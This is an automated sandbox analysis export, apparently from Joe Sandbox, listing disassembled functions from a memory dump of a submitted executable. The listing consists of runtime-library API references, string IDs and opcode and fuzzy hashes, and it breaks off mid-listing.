                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: list too long
                                                                                                        • API String ID: 0-1124181908
                                                                                                        • Opcode ID: a5245b38a6cae8331673fca654bc7759d69750e66ac9d5e9a61219855cd542d3
                                                                                                        • Instruction ID: 8673fe865725f0b812fae9c50a462405a6c70102f8d3eabc162b4d86d0333de0
                                                                                                        • Opcode Fuzzy Hash: a5245b38a6cae8331673fca654bc7759d69750e66ac9d5e9a61219855cd542d3
                                                                                                        • Instruction Fuzzy Hash: 905194B0D44719EBDB20DF64CC49B99F7B4FF04310F1082A9E91C97281DB78AA81CB96
                                                                                                        Function 0078C4E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 0078C517
                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 0078C51F
                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 0078C5A8
                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 0078C5D3
                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 0078C628
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                        • String ID: csm
                                                                                                        • API String ID: 1170836740-1018135373
                                                                                                        • Opcode ID: d5d320f8f21e27bb2d12b300061f2c5799df903e663dc723087dcc0c303407d1
                                                                                                        • Instruction ID: 24dd53b5ff1f62b6f8783f1bbb11c89a7633aaebcce80e28acb7e8830452dfce
                                                                                                        • Opcode Fuzzy Hash: d5d320f8f21e27bb2d12b300061f2c5799df903e663dc723087dcc0c303407d1
                                                                                                        • Instruction Fuzzy Hash: 6D410674A40208DBCF11EF69CC45AAEBBB5EF45324F248155E8186B392D739EE51CFA0
                                                                                                        Function 007980D5 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: api-ms-$ext-ms-
                                                                                                        • API String ID: 0-537541572
                                                                                                        • Opcode ID: 7c7660960f62f57a3af61aa11de1700ddb1d3148b544555487e084ab25ea2e75
                                                                                                        • Instruction ID: 96a811caa1ea7b392b9c66b02ade69a3497a66b4dcd7893a2d01fa7c45a36271
                                                                                                        • Opcode Fuzzy Hash: 7c7660960f62f57a3af61aa11de1700ddb1d3148b544555487e084ab25ea2e75
                                                                                                        • Instruction Fuzzy Hash: 9921BB72E81729BBCFA15B24BC89F5B3764AF02760F250618ED15A7291DF3CDD0286D2
                                                                                                        Function 007A0E88 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 007A0BD4: _free.LIBCMT ref: 007A0BF9
                                                                                                        • _free.LIBCMT ref: 007A0ED6
                                                                                                          • Part of subcall function 00797C06: HeapFree.KERNEL32(00000000,00000000,?,007A0BFE,?,00000000,?,8B18EC83,?,007A0EA1,?,00000007,?,?,007A1346,?), ref: 00797C1C
                                                                                                          • Part of subcall function 00797C06: GetLastError.KERNEL32(?,?,007A0BFE,?,00000000,?,8B18EC83,?,007A0EA1,?,00000007,?,?,007A1346,?,?), ref: 00797C2E
                                                                                                        • _free.LIBCMT ref: 007A0EE1
                                                                                                        • _free.LIBCMT ref: 007A0EEC
                                                                                                        • _free.LIBCMT ref: 007A0F40
                                                                                                        • _free.LIBCMT ref: 007A0F4B
                                                                                                        • _free.LIBCMT ref: 007A0F56
                                                                                                        • _free.LIBCMT ref: 007A0F61
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 776569668-0
                                                                                                        • Opcode ID: 754e41f7b128c0b27d83c6c6f545dee9b963ccc8453acbe9e150d344b889af71
                                                                                                        • Instruction ID: a37f64e98f95ceb71d6fd291f46c847e6c80a0f4d179daff85939766d41db878
                                                                                                        • Opcode Fuzzy Hash: 754e41f7b128c0b27d83c6c6f545dee9b963ccc8453acbe9e150d344b889af71
                                                                                                        • Instruction Fuzzy Hash: C611FCB1945B04EBDA31BBB0CD0AFCBB7AC9F46705F404D15B2AAB6052DB7DA50487A0
                                                                                                        Function 007971BF Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetConsoleOutputCP.KERNEL32(?,00000000,?), ref: 00797207
                                                                                                        • __fassign.LIBCMT ref: 007973EC
                                                                                                        • __fassign.LIBCMT ref: 00797409
                                                                                                        • WriteFile.KERNEL32(?,8B18EC83,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00797451
                                                                                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00797491
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00797539
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                                                                        • String ID:
                                                                                                        • API String ID: 1735259414-0
                                                                                                        • Opcode ID: dde52a83fd7814d55b715134748a5acca07e5d21d351cf638ddc6ccea241ddca
                                                                                                        • Instruction ID: 68711251380a50575b91445eb8d2c1a7d2d8ef3fa8bbcb18ca473a986d4fa5a0
                                                                                                        • Opcode Fuzzy Hash: dde52a83fd7814d55b715134748a5acca07e5d21d351cf638ddc6ccea241ddca
                                                                                                        • Instruction Fuzzy Hash: A0C19E71D04298DFCF14CFA8D8849EDBBB5AF08314F28816AE855FB352D6359D42CB60
                                                                                                        Function 007939C1 Relevance: 9.2, APIs: 6, Instructions: 221COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _free.LIBCMT ref: 00793A51
                                                                                                        • _free.LIBCMT ref: 00793A6C
                                                                                                        • _free.LIBCMT ref: 00793A77
                                                                                                        • _free.LIBCMT ref: 00793B84
                                                                                                          • Part of subcall function 0079A21A: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,007969C2,00000001,00000364,00000006,000000FF,?,?,00789ABF,007808E7,?,007830BE,8B18EC84), ref: 0079A25B
                                                                                                        • _free.LIBCMT ref: 00793B59
                                                                                                          • Part of subcall function 00797C06: HeapFree.KERNEL32(00000000,00000000,?,007A0BFE,?,00000000,?,8B18EC83,?,007A0EA1,?,00000007,?,?,007A1346,?), ref: 00797C1C
                                                                                                          • Part of subcall function 00797C06: GetLastError.KERNEL32(?,?,007A0BFE,?,00000000,?,8B18EC83,?,007A0EA1,?,00000007,?,?,007A1346,?,?), ref: 00797C2E
                                                                                                        • _free.LIBCMT ref: 00793B7A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$Heap$AllocateErrorFreeLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 4150789928-0
                                                                                                        • Opcode ID: f669de0687797ed57ce47df245dffefe7c5252116b9ddced64d738c044e34fab
                                                                                                        • Instruction ID: 187ba44a2c5ee5c714fca5a08f5a56e0f5f9076c45e84858a1a43bf677ca7091
                                                                                                        • Opcode Fuzzy Hash: f669de0687797ed57ce47df245dffefe7c5252116b9ddced64d738c044e34fab
                                                                                                        • Instruction Fuzzy Hash: F4519F76A04200EBDF14DF78B856BBA77B9DF85324F244059F945EB241EA3A9F02C360
                                                                                                        Function 007894C6 Relevance: 9.2, APIs: 6, Instructions: 175COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 0078950F
                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 0078957A
                                                                                                        • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00789597
                                                                                                        • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 007895D6
                                                                                                        • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00789635
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00789658
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiStringWide
                                                                                                        • String ID:
                                                                                                        • API String ID: 2829165498-0
                                                                                                        • Opcode ID: 29733510d9301dad536363e80435ff992e40b0a400249c3a0d164cd83977cb2a
                                                                                                        • Instruction ID: 90afe9e9fb15e1ae3d8f31db9b4bcc25859ba5d42a4dedf8e774d83de107b473
                                                                                                        • Opcode Fuzzy Hash: 29733510d9301dad536363e80435ff992e40b0a400249c3a0d164cd83977cb2a
                                                                                                        • Instruction Fuzzy Hash: 1D518172640206FBDF21AFA5DC49FBB7BA9EF44750F184225FA05A6190E739CD10CB94
                                                                                                        Function 00784470 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 007844A5
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 007844C7
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 007844E7
                                                                                                        • __Getctype.LIBCPMT ref: 0078457D
                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0078459C
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 007845B4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                                                                                        • String ID:
                                                                                                        • API String ID: 1102183713-0
                                                                                                        • Opcode ID: c28b54475201330743293b74aa7f4ad2e37756340fddc9580c7538850493fd0a
                                                                                                        • Instruction ID: 5fbe931d92d3c8f5ebf670ed435e899bfa37cb52b08a2132bad4cb06343369a7
                                                                                                        • Opcode Fuzzy Hash: c28b54475201330743293b74aa7f4ad2e37756340fddc9580c7538850493fd0a
                                                                                                        • Instruction Fuzzy Hash: 1141CD71A4021ACFCB25EF54C885BAEB7F4FF44710F14812DE806AB251EB78AE41CB91
                                                                                                        Function 0078C6A4 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(?,007AB85D,0078C69B,0078AD34,00787A49,3F07E9DB,?,?,?,00000000,007AC427,000000FF,?,00762576,?,?), ref: 0078C6B2
                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0078C6C0
                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0078C6D9
                                                                                                        • SetLastError.KERNEL32(00000000,?,00000000,007AC427,000000FF,?,00762576,?,?,0000000F,00763BA5,00000000,0000000F,00000000,007ABDB0,000000FF), ref: 0078C72B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                        • String ID:
                                                                                                        • API String ID: 3852720340-0
                                                                                                        • Opcode ID: 504881566fa92e16e2b951f6fe3cb8bd2d3588f684ac6c650da3f547429c388b
                                                                                                        • Instruction ID: 3ac2a6c8c5aaea0c24384b6253dff52e672bba697d267d9c6340c39d0913ba74
                                                                                                        • Opcode Fuzzy Hash: 504881566fa92e16e2b951f6fe3cb8bd2d3588f684ac6c650da3f547429c388b
                                                                                                        • Instruction Fuzzy Hash: 6A0124322887199EAA2637747C8DE672B44EB017B1334033EF111900F1EF6E5C419764
                                                                                                        Function 0079EB24 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 206COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free_strpbrk
                                                                                                        • String ID: *?
                                                                                                        • API String ID: 3300345361-2564092906
                                                                                                        • Opcode ID: ec893f68a9b9820c70cf9fad58df00a08a73714105b07aeaa9d9d9ed059e9918
                                                                                                        • Instruction ID: 7d1e5f8ba12bc692ced128a63c2c7ebf86fecf8d7bc240a90e6c4259fb4fad5a
                                                                                                        • Opcode Fuzzy Hash: ec893f68a9b9820c70cf9fad58df00a08a73714105b07aeaa9d9d9ed059e9918
                                                                                                        • Instruction Fuzzy Hash: 1C614CB5E00219AFDF14CFA8D8819EDFBF5EF49310B24816AE845E7340D635AE418BA0
                                                                                                        Function 00785B10 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 141COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __Mtx_unlock.LIBCPMT ref: 00785BE7
                                                                                                        • std::_Rethrow_future_exception.LIBCPMT ref: 00785C39
                                                                                                        • std::_Rethrow_future_exception.LIBCPMT ref: 00785C49
                                                                                                          • Part of subcall function 00763A60: __Mtx_unlock.LIBCPMT ref: 00763B54
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Mtx_unlockRethrow_future_exceptionstd::_
                                                                                                        • String ID: 5|
                                                                                                        • API String ID: 3298230783-531852093
                                                                                                        • Opcode ID: 1dc70139d722e8e2c9f8ec678defff2caf6982ca93a70db71c3f8f1cb1beea88
                                                                                                        • Instruction ID: 341db6591b7136cedc903c028310de71917f70d9e42306fe7a680cc8303d38f7
                                                                                                        • Opcode Fuzzy Hash: 1dc70139d722e8e2c9f8ec678defff2caf6982ca93a70db71c3f8f1cb1beea88
                                                                                                        • Instruction Fuzzy Hash: D0413A71D407089BDB14FBA4D849BAFBBA8AF15300F40456EF54367642EB39A548C7B2
                                                                                                        Function 0079F0E9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe, xrefs: 0079F0EE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe
                                                                                                        • API String ID: 0-1978484262
                                                                                                        • Opcode ID: 5c5446fc6b9d2903fd09af04f49d6b8a14eaf3c477ea78fe10ad7a40636a3dfb
                                                                                                        • Instruction ID: 0064e380ed8c5c378aa506ac07519111eed498706f2ce663eb51289ecf26c5eb
                                                                                                        • Opcode Fuzzy Hash: 5c5446fc6b9d2903fd09af04f49d6b8a14eaf3c477ea78fe10ad7a40636a3dfb
                                                                                                        • Instruction Fuzzy Hash: 5B219F71644209EFEF20AF65EC85DAB77ADEF013A47104624F428D6251DB38DC4087E0
                                                                                                        Function 00764910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ___std_exception_copy.LIBVCRUNTIME ref: 0076499F
                                                                                                          • Part of subcall function 0078AD46: RaiseException.KERNEL32(E06D7363,00000001,00000003,007625DC,007808E7,8B18EC83,?,007625DC,?,007C357C), ref: 0078ADA6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionRaise___std_exception_copy
                                                                                                        • String ID: 85|$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                        • API String ID: 3109751735-2855507302
                                                                                                        • Opcode ID: 54afa325be7efd8835d882b6b0cd55c6c8794af70bc90dbdef17bdead65ef9d1
                                                                                                        • Instruction ID: 4e489aa87371eeb6eed1fd635c4c6c1089d289cb07d7e0f0e246a860a259ff56
                                                                                                        • Opcode Fuzzy Hash: 54afa325be7efd8835d882b6b0cd55c6c8794af70bc90dbdef17bdead65ef9d1
                                                                                                        • Instruction Fuzzy Hash: D51103B1640705AFC714DF68C806B96B3E8AF51310F10C53AFD568B681E7B8F914CB91
                                                                                                        Function 0078D6F7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,0078D7B8,?,?,00000000,?,?,0078D86A,00000002,FlsGetValue,007B23E8,007B23F0,?), ref: 0078D787
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeLibrary
                                                                                                        • String ID: api-ms-
                                                                                                        • API String ID: 3664257935-2084034818
                                                                                                        • Opcode ID: cc022fac397f51ec379b61b1a2aaddc00a318c07c0ef433127685fc71a8ddf7a
                                                                                                        • Instruction ID: c64be7dec321f3d0d9d9a2cd01f235e55c5178ebaf7ff55e8a17053e20fce96e
                                                                                                        • Opcode Fuzzy Hash: cc022fac397f51ec379b61b1a2aaddc00a318c07c0ef433127685fc71a8ddf7a
                                                                                                        • Instruction Fuzzy Hash: 8911A575A81721ABDF326B789C49B5E77A4AF01B70F254620E911E72C0E77CED008BD5
                                                                                                        Function 0078DB92 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0078DB87,?,?,0078DB4F,00000000,00000000,?), ref: 0078DBA7
                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0078DBBA
                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,0078DB87,?,?,0078DB4F,00000000,00000000,?), ref: 0078DBDD
